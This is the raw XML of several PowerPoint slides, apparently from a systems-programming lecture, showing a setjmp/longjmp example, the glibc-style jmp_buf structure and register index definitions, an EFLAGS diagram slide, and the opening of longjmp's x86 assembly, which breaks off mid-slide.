              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>f1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  if (check == error) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>longjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(e, ERROR1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    /* unreachable */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    f2(e);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65498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978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9978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9978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9978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9978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9978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9978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99784">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99784">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99784">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99784">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99784">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99784">
                                            <p:txEl>
                                              <p:pRg st="14" end="1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99785">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99785">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99785">
                                            <p:txEl>
                                              <p:pRg st="2" end="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99785">
                                            <p:txEl>
                                              <p:pRg st="3" end="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99785">
                                            <p:txEl>
                                              <p:pRg st="4" end="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99785">
                                            <p:txEl>
                                              <p:pRg st="5" end="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99785">
                                            <p:txEl>
                                              <p:pRg st="6" end="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99785">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>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99785">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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99785">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>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99785">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>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99785">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>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99785">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>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99785">
                                            <p:txEl>
                                              <p:pRg st="13" end="13"/>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099785">
                                            <p:txEl>
                                              <p:pRg st="14" end="14"/>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09978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28" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>jmp_buf Implementation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1101829" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>typedef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[6];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># define JB_BX  0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># define JB_SI  1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># define JB_DI  2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># define JB_BP  3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># define JB_SP  4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># define JB_PC  5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># define JB_SIZE 24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/* Calling environment, plus possibly a saved signal mask.  */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>typedef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp_buf_tag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmpbuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;      /* Calling environment.  */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mask_was_saved</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;    /* Saved the signal mask? */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sigset_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>saved_mask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>; /* Saved signal mask.  */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  } </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="779450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194" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>EFLAGS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1032196" name="Picture 4" descr="eflag"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2047205" y="1920480"/>
            <a:ext cx="4926428" cy="3838953"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="179244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2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3875" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2000250"/>
            <a:ext cx="8839200" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1103876" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>jmp_buf Implementation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1103877" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>longjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,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-&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>                    /* return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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
